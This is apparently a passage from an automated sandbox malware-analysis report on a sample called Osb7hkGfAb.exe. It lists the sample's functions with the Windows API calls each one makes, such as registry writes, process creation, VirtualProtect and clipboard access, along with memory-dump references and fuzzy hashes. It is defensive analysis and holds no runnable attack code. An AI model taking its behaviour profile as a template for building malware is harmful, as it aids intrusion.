                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: PathSearch
                                                                          • String ID:
                                                                          • API String ID: 2203818243-0
                                                                          • Opcode ID: e053cd0a5a713bcd6573213f31fe775dca372833d122c7f25a227a8b80c7c065
                                                                          • Instruction ID: 99b882ef8ac932529d6fdfe3c41faefb6a71927cb26e20fd81cb329c01224dc0
                                                                          • Opcode Fuzzy Hash: e053cd0a5a713bcd6573213f31fe775dca372833d122c7f25a227a8b80c7c065
                                                                          • Instruction Fuzzy Hash: 93E0DF72304210EFD710DF649E49BAB37A8DF10368B20427AE111A60C2E6F89906873D
                                                                          Function 00405FAB Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402C7F,00000000,?,?), ref: 00405FD4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          • Opcode ID: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                                          • Instruction ID: 8c71f3c26dc4a4bf3eef9e60a583d004d00a96479e721722a8f6be6a9d57506c
                                                                          • Opcode Fuzzy Hash: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                                          • Instruction Fuzzy Hash: 1CE0E6B201450ABEDF095F50DD0ED7B3B1DE704300F14452EF906D4050E6B5A9205A34
                                                                          Function 00405D08 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032FD,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405D1C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID:
                                                                          • API String ID: 2738559852-0
                                                                          • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                                          • Instruction ID: 6bc3b1048b15a49576125e72cb6f14b4cec2b2626e36b687d4021167e808d8fe
                                                                          • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                                          • Instruction Fuzzy Hash: 2BE08C3221021EABCF109E608C08EEB3B6CEF00360F048833FD54E2140D234E8209BA4
                                                                          Function 00405D37 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032B3,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405D4B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID:
                                                                          • API String ID: 3934441357-0
                                                                          • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                          • Instruction ID: 0f83f4d47d9459a9b0ba24ed2798b341cbbd10940215494d2392ac534f962254
                                                                          • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                          • Instruction Fuzzy Hash: 41E08C3220025AABCF10AFA08C04EEB3B6CEF00360F008833FA15E7050D630E8219BA8
                                                                          Function 700E2921 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(700E404C,00000004,00000040,700E403C), ref: 700E293F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2805650198.00000000700E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 700E0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2805623249.00000000700E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2805669903.00000000700E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2805690432.00000000700E5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_700e0000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 3dc4ba8ca52d7204692d01d87351ad0c870eebcbd1fdd47e623c5d9c5960a16a
                                                                          • Instruction ID: 229504b8f0cc91d0f9e9525968ba653d8c3adf6f9ccb5be4444e40812d19fc79
                                                                          • Opcode Fuzzy Hash: 3dc4ba8ca52d7204692d01d87351ad0c870eebcbd1fdd47e623c5d9c5960a16a
                                                                          • Instruction Fuzzy Hash: 4EF028B3914240DEE3A0EF7B9CC47093FE1A715E75B21457AE768F6261E3B445448B11
                                                                          Function 004023E0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402413
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: PrivateProfileString
                                                                          • String ID:
                                                                          • API String ID: 1096422788-0
                                                                          • Opcode ID: b20ff68c1f91e8945650ad06eb6636fe2efcf37a6f72d7170e5f25b2e3b7c808
                                                                          • Instruction ID: ec2b9ed2aa8753cc56e49b6d1f5b0ead50a941972cde74363bc07da0fbfd84e4
                                                                          • Opcode Fuzzy Hash: b20ff68c1f91e8945650ad06eb6636fe2efcf37a6f72d7170e5f25b2e3b7c808
                                                                          • Instruction Fuzzy Hash: 40E04630904208BAEB006FA08E09EAD3A79EF01710F20003AF9617B0D1E6B89482D72E
                                                                          Function 00405F7D Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,0042A070,?,?,0040600B,0042A070,?,?,?,00000002,Call), ref: 00405FA1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Open
                                                                          • String ID:
                                                                          • API String ID: 71445658-0
                                                                          • Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                          • Instruction ID: 8d979316dbb681ef417a562383420c35b8ea1d7cbf1ba97b3ef1f912197d15a8
                                                                          • Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                          • Instruction Fuzzy Hash: 26D0EC7200460ABBDF115E90DD05FAB3B1DEB08310F044426FA05E5091D679D530AA25
                                                                          Function 0040159D Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 5887674a1f5513ec9541be2dff6cbc71c684969360942c525d855edfecb85619
                                                                          • Instruction ID: 936ed37629fa473271aaed7dd48578ad272974d6d3f069640798472dc64bc079
                                                                          • Opcode Fuzzy Hash: 5887674a1f5513ec9541be2dff6cbc71c684969360942c525d855edfecb85619
                                                                          • Instruction Fuzzy Hash: F6D01232704115DBDB10EFA59B08A9E73B5EB10325B308277E111F21D1E6B9C9469A2D
                                                                          Function 00403300 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 0040330E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: FilePointer
                                                                          • String ID:
                                                                          • API String ID: 973152223-0
                                                                          • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                          • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                                          • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                          • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                                          Function 00401F7B Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,774D23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,774D23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                            • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,774D23A0), ref: 0040527A
                                                                            • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                            • Part of subcall function 00405796: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                                            • Part of subcall function 00405796: CloseHandle.KERNEL32(?), ref: 004057CC
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FC0
                                                                            • Part of subcall function 00406575: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406586
                                                                            • Part of subcall function 00406575: GetExitCodeProcess.KERNEL32(?,?), ref: 004065A8
                                                                            • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                          • String ID:
                                                                          • API String ID: 2972824698-0
                                                                          • Opcode ID: ada5aadaf350f23a8dbf3a026041224ab9f957c4560aafed3a43088b721b475c
                                                                          • Instruction ID: 93961662e530d2e5a08160df11036b73ffef590b917d11c16f189fde5a143e01
                                                                          • Opcode Fuzzy Hash: ada5aadaf350f23a8dbf3a026041224ab9f957c4560aafed3a43088b721b475c
                                                                          • Instruction Fuzzy Hash: 88F09032A05021EBCB20BBA15E84DAFB2B5DF01318B21423FF502B21D1DB7C4D425A6E
                                                                          Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          • Opcode ID: 5004c81fc86d5aad5056578f097f916dd0ceefac499e9113037a72ef071e40e2
                                                                          • Instruction ID: c67a8691079fc4563931701ff3f7f14ff0a893aaeadd9329411c5994133067d8
                                                                          • Opcode Fuzzy Hash: 5004c81fc86d5aad5056578f097f916dd0ceefac499e9113037a72ef071e40e2
                                                                          • Instruction Fuzzy Hash: 0CD05E73B10100DBD720EBB8BAC485F77B8EB503253308837E402E2091E579C8424628

                                                                          Non-executed Functions

                                                                          Function 0040535C Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,00000403), ref: 004053BB
                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004053CA
                                                                          • GetClientRect.USER32(?,?), ref: 00405407
                                                                          • GetSystemMetrics.USER32(00000002), ref: 0040540E
                                                                          • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040542F
                                                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405440
                                                                          • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405453
                                                                          • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405461
                                                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405474
                                                                          • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405496
                                                                          • ShowWindow.USER32(?,00000008), ref: 004054AA
                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004054CB
                                                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004054DB
                                                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004054F4
                                                                          • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405500
                                                                          • GetDlgItem.USER32(?,000003F8), ref: 004053D9
                                                                            • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040551C
                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000052F0,00000000), ref: 0040552A
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405531
                                                                          • ShowWindow.USER32(00000000), ref: 00405554
                                                                          • ShowWindow.USER32(?,00000008), ref: 0040555B
                                                                          • ShowWindow.USER32(00000008), ref: 004055A1
                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004055D5
                                                                          • CreatePopupMenu.USER32 ref: 004055E6
                                                                          • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004055FB
                                                                          • GetWindowRect.USER32(?,000000FF), ref: 0040561B
                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405634
                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405670
                                                                          • OpenClipboard.USER32(00000000), ref: 00405680
                                                                          • EmptyClipboard.USER32 ref: 00405686
                                                                          • GlobalAlloc.KERNEL32(00000042,?), ref: 0040568F
                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405699
                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056AD
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004056C6
                                                                          • SetClipboardData.USER32(00000001,00000000), ref: 004056D1
                                                                          • CloseClipboard.USER32 ref: 004056D7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                          • String ID:
                                                                          • API String ID: 590372296-0
                                                                          • Opcode ID: e77ccb86652fbc0499d97b80cacae04005d5d9073b444bb924cd904a6cf5059e
                                                                          • Instruction ID: ad896caeff922a337f51dbee0e8d50556c939e1053927b0f1ec287220421205b
                                                                          • Opcode Fuzzy Hash: e77ccb86652fbc0499d97b80cacae04005d5d9073b444bb924cd904a6cf5059e
                                                                          • Instruction Fuzzy Hash: 3DA14A70900608BFDB119F61DD89EAE7FB9FB08354F50403AFA45BA1A0CB754E519F68
                                                                          Function 0040460D Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 274stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,000003FB), ref: 0040465C
                                                                          • SetWindowTextA.USER32(00000000,?), ref: 00404686
                                                                          • SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404737
                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404742
                                                                          • lstrcmpiA.KERNEL32(Call,0042A890), ref: 00404774
                                                                          • lstrcatA.KERNEL32(?,Call), ref: 00404780
                                                                          • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404792
                                                                            • Part of subcall function 004057F7: GetDlgItemTextA.USER32(?,?,00000400,004047C9), ref: 0040580A
                                                                            • Part of subcall function 004063D2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Osb7hkGfAb.exe",774D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                                            • Part of subcall function 004063D2: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                                            • Part of subcall function 004063D2: CharNextA.USER32(?,"C:\Users\user\Desktop\Osb7hkGfAb.exe",774D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                                            • Part of subcall function 004063D2: CharPrevA.USER32(?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                                          • GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,00000001,00429860,?,?,000003FB,?), ref: 00404850
                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040486B
                                                                            • Part of subcall function 004049C4: lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                                            • Part of subcall function 004049C4: wsprintfA.USER32 ref: 00404A6A
